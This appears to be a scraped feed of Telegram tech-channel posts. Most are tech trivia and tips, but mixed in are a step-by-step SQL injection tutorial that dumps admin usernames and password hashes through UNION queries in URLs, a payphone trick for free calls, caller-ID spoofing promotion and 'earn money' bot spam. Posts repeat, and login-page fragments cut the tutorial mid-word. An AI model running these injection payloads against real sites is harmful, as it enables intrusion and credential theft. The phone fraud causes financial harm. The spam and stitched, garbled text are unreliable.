This is just the beginning, we'll hold more "contests" in the future and the winners may even get rewards. Keep sharing this channel, join our group, @GEEKernel, if you haven't and have fun.
Text me, @romL3N, to decide what the next #SetupWars will be about. PCs, Custom ROMs, desktop skins, consoles,...etc. Ciao!
Text me, @romL3N, to decide what the next #SetupWars will be about. PCs, Custom ROMs, desktop skins, consoles,...etc. Ciao!
Hacking - The No-Nonsense Guide @techbyte.pdf
968.9 KB
Hacking: The No-Nonsense Guide
Learn Hacking within 12 hours with this guide. You'll need Kali Linux dual booted, in a live disk or a virtual machine.
Happy Hacking!
- @techBYTE
Learn Hacking within 12 hours with this guide. You'll need Kali Linux dual booted, in a live disk or a virtual machine.
Happy Hacking!
- @techBYTE
As I promised Today Will Show You How To Find Bug On Site!
Check for vulnerability It's one of the most common vulnerability in web applications today. It allows attacker to execute database query in url and gain access to some confidential Information etc...( In shortly). Let's say that we have some site like this http://www.site.com/news.php?id=5 Now to test if is vulnerable we add to the end of url ' (quote), and that would be http://www.site.com/news.php?id=5' so if we get some error like "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..." Or something similar That means is vulnerable to sql injection :) Step 2:- Find the number of columns To find number of columns we use statement ORDER BY (tells database how to order the result) so how to use it? Well just incrementing the number until we get an error. http://www.site.com/news.php?id=5 order by 1/* <-- no error http://www.site.com/news.php?id=5 order by 2/* <-- no error http://www.site.com/news.php?id=5 order by 3/* <-- no error http://www.site.com/news.php?id=5 order by 4/* <-- error (We get message like this Unknown column '4' in 'order clause' or something like that) That means that the it has 3 columns, because we got an error on 4. Step 3:- Check for UNION function
With union we can select more data in one sql statement. So we have http://www.site.com/news.php?id=5 union all select 1,2,3/* 2010 (We already found that numbers of columns are 3 in section 2). if we see some numbers on screen, i.e. 1 or 2 or 3 then the UNION works Step 4:- Check for MySQL version http://www.site.com/news.php?id=5 union all select 1,2,3/* NOTE: if /* not working or you get some error, then try -- it's a comment and it's important for our query to work properly. Let’s say that we have number 2 on the screen, now to check for version we replace the number 2 with @@version or version () and get something like 4.1.33-log or 5.0.45 or similar. It should look like this http://www.site.com/news.php?id=5 union all select 1,@@version,3/* if you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..." I didn't see any paper covering this problem, so i must write it . Step 5:- Getting table and column name What we need is convert () function i.e. http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/* Or with hex () and unhex () i.e.http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/* And you will get MySQL version. Well if the MySQL version is < 5 (i.e. 4.1.33, 4.1.12...) <--- later I will describe for MySQL > 5 version. We must guess table and column name in most cases. Common table names are: user/s, admin/s, and member/s ... common column names are: username, user, usr, username, password, pass, passwd, pwd etc... I.e. would be http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/* (We see number 2 on the screen like before, and that's good ) We know that table admin exists... Now to check column names. http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* (If you get an error, then try the other column name) We get username displayed on screen, example would be admin, or superadmin etc... Now to check if column password exists http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (If you get an error, then try the other column name) We seen password on the screen in hash or plain-text, it depends of how the database is set up . i.e. md5 hash, mysql hash, sha1... Now we must complete quer
Check for vulnerability It's one of the most common vulnerability in web applications today. It allows attacker to execute database query in url and gain access to some confidential Information etc...( In shortly). Let's say that we have some site like this http://www.site.com/news.php?id=5 Now to test if is vulnerable we add to the end of url ' (quote), and that would be http://www.site.com/news.php?id=5' so if we get some error like "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..." Or something similar That means is vulnerable to sql injection :) Step 2:- Find the number of columns To find number of columns we use statement ORDER BY (tells database how to order the result) so how to use it? Well just incrementing the number until we get an error. http://www.site.com/news.php?id=5 order by 1/* <-- no error http://www.site.com/news.php?id=5 order by 2/* <-- no error http://www.site.com/news.php?id=5 order by 3/* <-- no error http://www.site.com/news.php?id=5 order by 4/* <-- error (We get message like this Unknown column '4' in 'order clause' or something like that) That means that the it has 3 columns, because we got an error on 4. Step 3:- Check for UNION function
With union we can select more data in one sql statement. So we have http://www.site.com/news.php?id=5 union all select 1,2,3/* 2010 (We already found that numbers of columns are 3 in section 2). if we see some numbers on screen, i.e. 1 or 2 or 3 then the UNION works Step 4:- Check for MySQL version http://www.site.com/news.php?id=5 union all select 1,2,3/* NOTE: if /* not working or you get some error, then try -- it's a comment and it's important for our query to work properly. Let’s say that we have number 2 on the screen, now to check for version we replace the number 2 with @@version or version () and get something like 4.1.33-log or 5.0.45 or similar. It should look like this http://www.site.com/news.php?id=5 union all select 1,@@version,3/* if you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..." I didn't see any paper covering this problem, so i must write it . Step 5:- Getting table and column name What we need is convert () function i.e. http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/* Or with hex () and unhex () i.e.http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/* And you will get MySQL version. Well if the MySQL version is < 5 (i.e. 4.1.33, 4.1.12...) <--- later I will describe for MySQL > 5 version. We must guess table and column name in most cases. Common table names are: user/s, admin/s, and member/s ... common column names are: username, user, usr, username, password, pass, passwd, pwd etc... I.e. would be http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/* (We see number 2 on the screen like before, and that's good ) We know that table admin exists... Now to check column names. http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* (If you get an error, then try the other column name) We get username displayed on screen, example would be admin, or superadmin etc... Now to check if column password exists http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (If you get an error, then try the other column name) We seen password on the screen in hash or plain-text, it depends of how the database is set up . i.e. md5 hash, mysql hash, sha1... Now we must complete quer
Site
Login | HSTS Redirection Community
HSTS Redirection Community Customer Secure Login Page. Login to your HSTS Redirection Community Customer Account.
y to look nice :) For that we can use concat () function (it joins strings) i.e. http://www.site.com/news.php?id=5 union all select 1,concat (Username, 0x3a, password),3 from admin/* Note that I put 0x3a, its hex value for: (so 0x3a is hex value for colon) (There is another way for that, char (58), ASCII value for : )
Site
Login | HSTS Redirection Community
HSTS Redirection Community Customer Secure Login Page. Login to your HSTS Redirection Community Customer Account.
Forwarded from RL channels
Earn Easy Money through Telegram
Telegram is a really good instant messaging platform, and thanks to the following bots, you can now easily make money through the app. It's simple and easy, just click all links and press Start!
1 » Pirate Game Bot
2 » Cash Robots
3 » Dino Game Bot
Telegram is a really good instant messaging platform, and thanks to the following bots, you can now easily make money through the app. It's simple and easy, just click all links and press Start!
1 » Pirate Game Bot
2 » Cash Robots
3 » Dino Game Bot
Apple Event Announcements
- iPhone X (pronounced iPhone Ten) with 64/256GB variants set to release on November 3, starting at $999
- AirPower wireless charging coming out in 2018
- iPhone 8 and 8 Plus
- Animoji, animated emoji for iPhone X
- FaceID will work on ApplePay & third party apps
- iPhone X (pronounced iPhone Ten) with 64/256GB variants set to release on November 3, starting at $999
- AirPower wireless charging coming out in 2018
- iPhone 8 and 8 Plus
- Animoji, animated emoji for iPhone X
- FaceID will work on ApplePay & third party apps
Hello🙌!This Is Kasahun
You want To Hack Coin Box(Calling)
Steps:
1.Insert Coin
2.Dial 0##Phone No. *(star)
3.Call Unlimited
4.And Disconnect
5.Coin Comes Out
Wow
It's Tried&Worked Successfully on Ethiopian Coin Box(calling Machines)!
You want To Hack Coin Box(Calling)
Steps:
1.Insert Coin
2.Dial 0##Phone No. *(star)
3.Call Unlimited
4.And Disconnect
5.Coin Comes Out
Wow
It's Tried&Worked Successfully on Ethiopian Coin Box(calling Machines)!
Vivo V7 With 24-Megapixel Selfie Camera Goes on Sale for First Time in India Today.
📌 telgr.ml/DK9jFdP
📌 telgr.ml/DK9jFdP
How do self driving cars work?
Various self-driving technologies have been developed by Google, Uber, Tesla, Nissan, and other major automakers, researchers, and technology companies.
While design details vary, most self-driving systems create and maintain an internal map of their surroundings, based on a wide array of sensors, like radar. Uber's self-driving prototypes use sixty-four laser beams, along with other sensors, to construct their internal map; Google's prototypes have, at various stages, used lasers, radar, high-powered cameras, and sonar.
Software then processes those inputs, plots a path, and sends instructions to the vehicle’s “actuators,” which control acceleration, braking, and steering. Hard-coded rules, obstacle avoidance algorithms, predictive modeling, and “smart” object discrimination (ie, knowing the difference between a bicycle and a motorcycle) help the software follow traffic rules and navigate obstacles.
Sensors generate a 3-dimensional map to aid navigation.
Partially-autonomous vehicles may require a human driver to intervene if the system encounters uncertainty; fully-autonomous vehicles may not even offer a steering wheel.
Self-driving cars can be further distinguished as being “connected” or not, indicating whether they can communicate with other vehicles and/or infrastructure, such as next generation traffic lights. Most prototypes do not currently have this capability.
Various self-driving technologies have been developed by Google, Uber, Tesla, Nissan, and other major automakers, researchers, and technology companies.
While design details vary, most self-driving systems create and maintain an internal map of their surroundings, based on a wide array of sensors, like radar. Uber's self-driving prototypes use sixty-four laser beams, along with other sensors, to construct their internal map; Google's prototypes have, at various stages, used lasers, radar, high-powered cameras, and sonar.
Software then processes those inputs, plots a path, and sends instructions to the vehicle’s “actuators,” which control acceleration, braking, and steering. Hard-coded rules, obstacle avoidance algorithms, predictive modeling, and “smart” object discrimination (ie, knowing the difference between a bicycle and a motorcycle) help the software follow traffic rules and navigate obstacles.
Sensors generate a 3-dimensional map to aid navigation.
Partially-autonomous vehicles may require a human driver to intervene if the system encounters uncertainty; fully-autonomous vehicles may not even offer a steering wheel.
Self-driving cars can be further distinguished as being “connected” or not, indicating whether they can communicate with other vehicles and/or infrastructure, such as next generation traffic lights. Most prototypes do not currently have this capability.
How does an optical fiber work?
Imagine what they'd make of modern fiber-optic cables "pipes" that can carry telephone calls and emails right around the world in a seventh of a second! Photo: Light pipe: fiber optics means sending light beams down thin strands of plastic or glass by making them bounce repeatedly off the walls.
Fiber optics is faster than most other transmission mediums. The signal has a constrained loss rate, which means that very little of a signal is lost over rather long distances.
Imagine what they'd make of modern fiber-optic cables "pipes" that can carry telephone calls and emails right around the world in a seventh of a second! Photo: Light pipe: fiber optics means sending light beams down thin strands of plastic or glass by making them bounce repeatedly off the walls.
Fiber optics is faster than most other transmission mediums. The signal has a constrained loss rate, which means that very little of a signal is lost over rather long distances.
What is URL ?
A URL (Uniform Resource Locator) is a form of URI and is a standardized naming convention for addressing documents accessible over the internet and Intranet. An example of a URL is http://web.telegram.org, which is the URL for the Web Telegram.
A URL (Uniform Resource Locator) is a form of URI and is a standardized naming convention for addressing documents accessible over the internet and Intranet. An example of a URL is http://web.telegram.org, which is the URL for the Web Telegram.
S-System is an Operating system designed for you with Special Love.S-System is very Efficient and Low Space OS which enhances your Experience surfing the Internet.You can use S-System for developing websites and also doing your graphical work and office works too because it has built in programsAnd Also you can install other programs which you use in Windows and also Linux programs too S-System is a Linux based operating system which can be ran on a PC with as low as 512 MB of RAM,S-System is also Customizable according to your Personality.S-System requires as low as 16 GB of HDD to run.This means that S-System really is an Efficient and Easy way to surf the web.S-System is very Powerful and Strong as it is a Linux based operating system you can use its Terminal for various purposes too.S-System is totally free and Available for download you can visit the link www.beyond-tech.org for more!
How to take Photos using your Android Phone's Fingerprint Sensor
Excited to make your smartphone's fingerprint sensor even better? Here's how you can use it to click pictures on any Android smartphone that has one.
Step 1) While some android smartphones' fingerprint sensors support the camera app, others don't. So you have to download an app from Google Play Store called Dactyl (It's available for trial usage for a maximum of 10 times after which you have to purchase it)
Step 2) After you've downloaded the app, the main page shows the Open Settings Page option. This allows you to configure accessibility and permission settings.
Step 3) Once you've granted permissions to all the required apps, you'll see all the apps that Dactyl supports. These include nearly all apps that come with in-app camera functionality like WhatsApp and Facebook.
Step 4) Once you've selected all the apps you want to use with the fingerprint sensor to take pictures, open the camera app on your smartphone. You will see a Dactyl Service Running notification just above the shutter button. Now just place your finger on the fingerprint sensor and you'll be able to click pictures.
@techBYTE
Excited to make your smartphone's fingerprint sensor even better? Here's how you can use it to click pictures on any Android smartphone that has one.
Step 1) While some android smartphones' fingerprint sensors support the camera app, others don't. So you have to download an app from Google Play Store called Dactyl (It's available for trial usage for a maximum of 10 times after which you have to purchase it)
Step 2) After you've downloaded the app, the main page shows the Open Settings Page option. This allows you to configure accessibility and permission settings.
Step 3) Once you've granted permissions to all the required apps, you'll see all the apps that Dactyl supports. These include nearly all apps that come with in-app camera functionality like WhatsApp and Facebook.
Step 4) Once you've selected all the apps you want to use with the fingerprint sensor to take pictures, open the camera app on your smartphone. You will see a Dactyl Service Running notification just above the shutter button. Now just place your finger on the fingerprint sensor and you'll be able to click pictures.
@techBYTE
How to Top-up Airtime on Airtel & Telkom Kenya using M-Pesa
For Kenyans, if you have a Telkom or Airtel SIM card and you want to top-up your airtime using M-PESA, the process is pretty easy. Follow the steps;
For Airtel:
• Go to M-PESA from your Safaricom line
• Select Pay Bill
• Under "Business Number", enter 220220, click OK
• Under "Account Name", enter AIRT0733XXXXXX (where 0733XXXXX is your AIRTEL number), click OK
• Enter the amount to be topped up and send
• You'll get an M-PESA confirmation text and a message from "CHAPCHAP" confirming the top up.
For Telkom
• The process is similar, enter business number "220220"
• Enter Account Name "TELK0777XXXXXX" (where 0777XXXXXX is your Telkom Kenya number)
• Enter Amount and PIN, click SEND
- What happened is, you sent the money from your M-PESA account to PesaPal (pesapal.com) and they'll "sambaza" the same amount in airtime to the number you specified in 'Account Name'. The whole procedure takes about 2 minutes. Enjoy.
@techBYTE
For Kenyans, if you have a Telkom or Airtel SIM card and you want to top-up your airtime using M-PESA, the process is pretty easy. Follow the steps;
For Airtel:
• Go to M-PESA from your Safaricom line
• Select Pay Bill
• Under "Business Number", enter 220220, click OK
• Under "Account Name", enter AIRT0733XXXXXX (where 0733XXXXX is your AIRTEL number), click OK
• Enter the amount to be topped up and send
• You'll get an M-PESA confirmation text and a message from "CHAPCHAP" confirming the top up.
For Telkom
• The process is similar, enter business number "220220"
• Enter Account Name "TELK0777XXXXXX" (where 0777XXXXXX is your Telkom Kenya number)
• Enter Amount and PIN, click SEND
- What happened is, you sent the money from your M-PESA account to PesaPal (pesapal.com) and they'll "sambaza" the same amount in airtime to the number you specified in 'Account Name'. The whole procedure takes about 2 minutes. Enjoy.
@techBYTE
Make your Number Private on Android Phone 2017
Below are the tricks of changing your Mobile Number to private number or Hide your caller ID easily:
1. Fun Call App: It is a most amazing one of the cool app which will help you to change your caller ID. You can change your caller ID to whichever you want to do. You don’t change the caller ID but you can also Change the Voice during the call. The app working like a premium app, Lot’s of inbuilt features are in the application.
The App working perfectly on the Apple iPhone as well as in the Android phone also. You will get some free points or be calling minute to use this, after that you need to buy minutes or promote the App. You can download the Fun App from the below given links.
How to Use Fun Call App in Android Phone
Open & install the app into the Android Phone.
Now enter the Number which you want to prank.
Select the Type of voice or Caller ID you want to use.
Click on dial button that’s all.
Now you are sharing your real-time voice.
Brought to you by @techBYTE
Below are the tricks of changing your Mobile Number to private number or Hide your caller ID easily:
1. Fun Call App: It is a most amazing one of the cool app which will help you to change your caller ID. You can change your caller ID to whichever you want to do. You don’t change the caller ID but you can also Change the Voice during the call. The app working like a premium app, Lot’s of inbuilt features are in the application.
The App working perfectly on the Apple iPhone as well as in the Android phone also. You will get some free points or be calling minute to use this, after that you need to buy minutes or promote the App. You can download the Fun App from the below given links.
How to Use Fun Call App in Android Phone
Open & install the app into the Android Phone.
Now enter the Number which you want to prank.
Select the Type of voice or Caller ID you want to use.
Click on dial button that’s all.
Now you are sharing your real-time voice.
Brought to you by @techBYTE